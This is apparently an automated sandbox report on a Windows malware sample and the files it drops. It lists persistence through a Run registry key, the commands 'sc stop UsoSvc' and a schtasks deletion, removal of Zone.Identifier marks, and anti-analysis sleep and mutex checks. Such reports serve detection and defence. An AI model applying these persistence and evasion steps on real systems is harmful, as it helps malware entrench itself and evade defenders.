                              Source: C:\Windows\sysppvrdnvs.exeFile created: C:\Users\user\AppData\Local\Temp\2355412914.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exeJump to dropped file
                              Source: C:\Windows\sysppvrdnvs.exeFile created: C:\Users\user\AppData\Local\Temp\2658326577.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeFile created: C:\Windows\sysppvrdnvs.exeJump to dropped file
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeFile created: C:\Users\user\AppData\Local\Temp\Setup_20241026012616_Failed.logJump to behavior

                              Boot Survival

                              barindex
                              Uses schtasks.exe or at.exe to add and modify task schedules
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
                              Source: C:\Windows\sysppvrdnvs.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\BITSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows SettingsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows SettingsJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Hides that the sample has been downloaded from the Internet (zone.identifier)
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeFile opened: C:\Users\user\AppData\Local\Temp\4BBF.exe:Zone.Identifier read attributes | deleteJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeFile opened: C:\Users\user\AppData\Local\Temp\71384504.exe:Zone.Identifier read attributes | deleteJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeFile opened: C:\Users\user\AppData\Local\Temp\71384504.exe:Zone.Identifier read attributes | deleteJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeFile opened: C:\Windows\sysppvrdnvs.exe:Zone.Identifier read attributes | deleteJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeFile opened: C:\Users\user\AppData\Local\Temp\651713841.exe:Zone.Identifier read attributes | deleteJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeFile opened: C:\Users\user\AppData\Local\Temp\1863518468.exe:Zone.Identifier read attributes | deleteJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeFile opened: C:\Users\user\AppData\Local\Temp\2355412914.exe:Zone.Identifier read attributes | deleteJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeFile opened: C:\Users\user\AppData\Local\Temp\2658326577.exe:Zone.Identifier read attributes | deleteJump to behavior
                              Loading BitLocker PowerShell Module
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                              Malware Analysis System Evasion

                              barindex
                              Contains functionality to detect sleep reduction / modifications
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeCode function: 3_2_0040D7703_2_0040D770
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_0040D7704_2_0040D770
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040D77017_2_0040D770
                              Found evasive API chain (may stop execution after checking mutex)
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                              Source: C:\Windows\sysppvrdnvs.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                              Source: C:\Windows\sysppvrdnvs.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeMemory allocated: D60000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeMemory allocated: 1B340000 memory reserve | memory write watchJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7595Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2154Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeEvaded block: after key decision
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeEvaded block: after key decision
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeEvaded block: after key decision
                              Source: C:\Windows\sysppvrdnvs.exeEvaded block: after key decision
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-53620
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                              Source: C:\Windows\sysppvrdnvs.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleep
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleep
                              Source: C:\Windows\sysppvrdnvs.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-53043
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeAPI coverage: 7.8 %
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeAPI coverage: 3.7 %
                              Source: C:\Windows\sysppvrdnvs.exeAPI coverage: 0.9 %
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040D77017_2_0040D770
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeCode function: 3_2_0040D7703_2_0040D770
                              Source: C:\Windows\sysppvrdnvs.exe TID: 7492Thread sleep time: -40000s >= -30000sJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exe TID: 7492Thread sleep count: 275 > 30Jump to behavior
                              Source: C:\Windows\sysppvrdnvs.exe TID: 7804Thread sleep time: -102655s >= -30000sJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exe TID: 8140Thread sleep time: -111360s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep count: 7595 > 30Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep count: 2154 > 30Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7828Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exe TID: 8164Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_004657B9 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 00465854h0_2_004657B9
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_004657B9 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 0046584Dh0_2_004657B9
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_004050E3 FindFirstFileW,FindClose,0_2_004050E3
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_0045C110 FindFirstFileExW,0_2_0045C110
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_0041D64B FindFirstFileW,FindNextFileW,FindClose,0_2_0041D64B
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_00401D86 GetFileAttributesW,GetLastError,SetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,GetLastError,DeleteFileW,MoveFileExW,MoveFileExW,GetLastError,FindNextFileW,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,FindClose,0_2_00401D86
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeCode function: 3_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,3_2_004068E0
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeCode function: 3_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,3_2_004067A0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,4_2_004068E0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_004067A0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,17_2_004068E0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,17_2_004067A0
